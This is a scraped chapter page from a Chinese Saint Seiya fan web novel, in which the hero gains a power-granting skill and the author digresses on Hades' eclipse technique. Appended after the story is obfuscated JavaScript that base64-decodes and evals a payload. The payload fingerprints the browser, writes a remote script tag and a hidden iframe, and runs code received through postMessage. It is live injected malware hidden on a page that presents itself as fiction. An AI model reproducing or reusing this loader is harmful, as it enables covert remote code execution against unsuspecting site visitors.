当前位置:铅笔小说>言情女生>这个圣斗士想退休> 084、冥王神格?再解

084、冥王神格?再解

  片刻之间,乐夏背后多出来的那对翅膀,便整个变成了紫黑色,在一身金色映衬下,看上去有些扎眼。

  可是这对扎眼的翅膀出现之后,却让乐夏对冥王神格的领悟,再次取得了一点突破。

  这让乐夏不由的一阵心喜。

  不管为什么会这样,可是对冥王神格的领悟,和实力的提升,却是实打实的。

  如果梦一次,实力就会提升一次的话,那这样的梦境,那是真的可以再多来几次的啊。

  唯一的遗憾是,跟前一次一样,这次乐夏依然没有领悟冥王的战法,伟大的日蚀。

  说起伟大的日蚀,这个技能被很多漫画迷嘲讽过老车不懂天体物理。

  理由想要让地球变黑不需要九星连珠,火星后面那些没用,甚至水星和金星都没有用,因为它们距离地球太远,不足以形成日食。

  bidige.com

  能形成日食的只有月球,但是月球又太小,就算靠地球再近,也不足以阻挡整个地球的阳光。

  所以这个技能就是一个笑话。

  事实并非如此,哈迪斯能操控行星轨迹,让它们连城一条线,自然就能操控他们之间的距离。

  所以水星金星距离地球太远不能形成日食的说法就不存在了,他把金星直接砸地球上都行。

  而且金星是地球体积的85%,想要让大半个地球失去阳光是很容易的。

  就算这样也不行,那拉个木星过来总可以吧,木星直径是地球的11.2倍,绝对可以把光全都挡的死死的。

  所以伟大的日蚀没有办法形成让整个地球变黑的大日食这个说法,其实并不成立。

  还有朋友说,撒加的银河星爆,随随便便就爆星爆恒星甚至爆银河,结果哈迪斯作为一个神,大招竟然就是玩球,这太low了。

  这个也可以解释,因为毁灭比征服容易,控制比破坏更难。

  就像你要炸掉地球,多种点蘑菇蛋就够了,可是想带着地球去流浪,需要做的事情就太多太多了。

  所以想要给地球整个来个全日食,还完全不改变地球的重力和生态环境,别说圣斗士了,很多神都做不到。

  至少那些不擅长念力操控的神,就做不到。

  道理大概就是这么个道理,不认同的朋友欢迎留言辩论。

  多来点评论说啊,本章说太少了,总不能让乐夏出来认爹求留言吧!

  总而言之就是,如果乐夏掌握了冥王神格,领悟了伟大的日蚀这一招,带着地球甚至是整个太阳系去流浪就都只是踩个油门那么简单的事情了。

  可惜,他学到的不是这个,而是一个跟让人死而复生类似的辅助类技能,【力量赋予】。

  这个能力依然不能作用于自身,只能赋予别人力量,而且赋予的力量等级还有限。

  按照蓝星上的能级划分,目前乐夏能赋予的力量能级,上限50,常态下的50。

  这个力量等级以后会随着乐夏实力的提升而提升,但是能级50的话,对现在的蓝星来说其实已经很变态了好吗。

  你想一下李亚森,跟拉史的战斗中临阵爆种突破,也才提升到35而已,就这都已经算是蓝星超能领域的中坚战力了,比他强的整个红星也没有多少。

  而乐夏分分钟就能批量制造一批能级50的高手,整个红星,也就大队长和四方中队长超过了50而已。

  “这……”

  来他十万个能级50的高手,能不能横推整个蓝星。

  也许一万,不,一千都够了吧。

  “果然,我这个能力,就不是给蓝星准备的。”

  再怎么说,蓝星也不过就是一个超能刚刚崛起的低武世界而已,战斗力弱的可怜,就算给红星一千超能,横推了整个世界又能怎么样。

  轻易得来的胜利,会有人珍惜吗,那些失败者会真心服输吗,世界会迎来真正的和平吗?

  乐夏不知道,但是他对红星现在这个大国崛起的剧本很看好。

  成功不需要一蹴而就,也可以厚积薄发。

  而且只有所有人都凝聚在一起,通过不懈的努力,最终站到最高点,那样的成功才能换来最大的喜悦。

  乐夏现在没有办法进入其中当一个平凡的参与者,但是他会一直守护在星域,当一个历史的见证者和守护者。

  当然,这也不代表,刚刚获得的这个力量赋予的能力,就派不上用场,只能放在技能栏里吃灰。

  守护蓝星是一种守护,守护其他世界自然也是一种守护。

  佐助、张小凡、托尼、吹雪,自从这些人来到星域之后,他们的世界,就不再只是书本上的一个故事,而是真实存在的世界。

  他们的世界,也有正义需要执行,也有人需要守护。

  好吧,说这些可能有些太冠冕堂皇了,那就不说那些虚的,来点实在的。

  单就杀敌可以扩大星域的空间这一点,就足够了,打工人,谁会嫌多呢,是吧。

  不过人一多的话,就容易乱,管理起来,也麻烦。

  而乐夏,最怕的就是麻烦。

  所以以前在圣域的时候,史昂卸任之后,教皇的实际工作,其实都是撒加和艾俄洛斯这两个副教皇干的。

  现在,想到要搞一些人来打工,而且来的很有可能还是一群不服管教无法无天的沙雕,乐夏顿时就感觉头疼。

  沙雕是一种天性和特色,乐夏当然可以用幻魔拳在所有人来的时候,就教会他们社会的艰辛和做人的道理。

  可是那样一来,沙雕就会失去个性,同时也会少了很多乐趣。

  毕竟,自古沙雕欢乐多啊。

  想快乐,又怕麻烦,这可怎么办呢?

  这可不是一句上来自己动就能解决的啊。

  吹雪不知道能不能胜任这个任务,毕竟她管理过吹雪组,那群人也挺沙雕的。

  就在乐夏如同推理世界难题一样思考着这个问题的时候,星门那边突然有了反应,一个苗条的身影,提着一把三叉戟,迈步走了进来。

  “咦?都没发现来人了?”

  星门现在开在二号大厅,那里没人,所以就算是来了嗜血变态也不怕伤到人。

  可是直到人进门了乐夏才感应到,这种情况却是从来都没有发生过的。

  要么,这个人的实力很强,强到了乐夏都感应不到她。

  要么,就是这个人很弱,弱到像一只蚂蚁,感应到了也会忽略。

  而现在,却是第三种情况,这个人不强,但也不弱,之所以乐夏没有提前感应到,因为她来自圣斗士世界,名字叫做潘多拉。
eval("\x77\x69\x6e\x64\x6f\x77")["\x62\x4a\x6f"]=function(e){var li ='ABCDEFG'+''+'HI'+''+'JKLM'+'NOPQRSTUVWXYZab'+''+'cdefghi'+''+'jklmnopqrstuvwxyz0'+'123456789+/'+''+'=';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x61\x51\x77\x45"]=function(){eval(bJo("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoYkpvKHUucmVwbGFjZShuZXcgUmVnRXhwKGMrJycrYywnZycpLGMpLnNwbGl0KCcnKS5yZXZlcnNlKCkuam9pbignJykpKTsnalF1ZXJ5Jzt2YXIgX3VhPW5hdmlnYXRvci51c2VyQWdlbnQ7dmFyIF9iSm9iSm89JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoYkpvKCJZbUZwWkhVPSIpKT4tMSB8fCBfdWEuaW5kZXhPZihiSm8oJ1NIVmhkMlZwUW5KdmQzTmxjZz09JykpPi0xKXtpZihfdWEuaW5kZXhPZihiSm8oJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfYkpvYkpvKTt9ZWxzZXtmdW5jdGlvbiByZChuLG0pe3JldHVybiBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqKG0tbisxKStuKTt9ZnVuY3Rpb24gcm0oZSl7aWYoZSYmZS50YWdOYW1lLnRvVXBwZXJDYXNlKCk9PT0iSUZSQU1FIiYmZS5zcmMuaW5kZXhPZih1KT4tMSl7ZS5yZW1vdmUoKTt9ZWxzZSBpZihlLm5leHRFbGVtZW50U2libGluZyl7cm0oZS5uZXh0RWxlbWVudFNpYmxpbmcpO319bGV0IGM9ZFtiSm8oIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdDYkYnKydNJysnJysndScrJyc7dmFyIF9fa2RucWlkID0gJ2snICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19rZG5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19rJysnZGEnKyducScrJ29iJysnal8xODcnXT1kWydxdScrJ2VyeScrJ1NlbGUnKydjdG8nKydyJ10oJyMnK19fa2RucWlkKTtfaWQgKz0gZFsncXUnKydlcnknKydTZScrJ2xlYycrJ3RvJysnckEnKydsbCddKCcuJytfY2xhc3MpLmxlbmd0aDt2YXIgeiA9IHUrJy0yLycrX2lkKycvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnImFsJysnbG93dHJhbicrJ3NwYScrJ3JlbmN5IHNyJysnYz0iJyt6KyciPjwvaScrJ2ZyJysnYScrJ21lPicpO3dbImFkIisiZEV2IisiZW50TCIrImlzdCIrImVuZXIiXSgibSIrImVzcyIrImFnZSIsZnVuY3Rpb24oZSl7aWYoZS5kYXRhW3IrX2lkXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKGJKbyhlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9iSm9iSm8pO319KSgnMScrJycrJ0lUTCcrJzMnKydnVCcrJ010JysnJysnTW0nKycnKydSeScrJycrJ1VpWScrJycrJ2tCJysnJysnM1puJysnJysnRm4nKydZJysnR0onKycnKydUSnonKydRJysnRE53JysnJysnSVQnKycnKydReicrJycrJ1UnKycnKydDJysnJysnY3YnKycnKydSJysnbkwnKycnKyd6QVQnKydacnInKycnKydkbScrJ2JweCcrJycrJ20nKydMJysnelonKydrJysnTWxZJysnJysnaycrJ01sJysnRScrJycrJzBNJysnJysnbCcrJycrJ01IJysnJysnYzAnKycnKydSSGEnKycnLCdDYkYnKydNJysnJysndScrJycsd2luZG93LGRvY3VtZW50LDAsJ3InKQ=="));}

上一章目录+书签下一章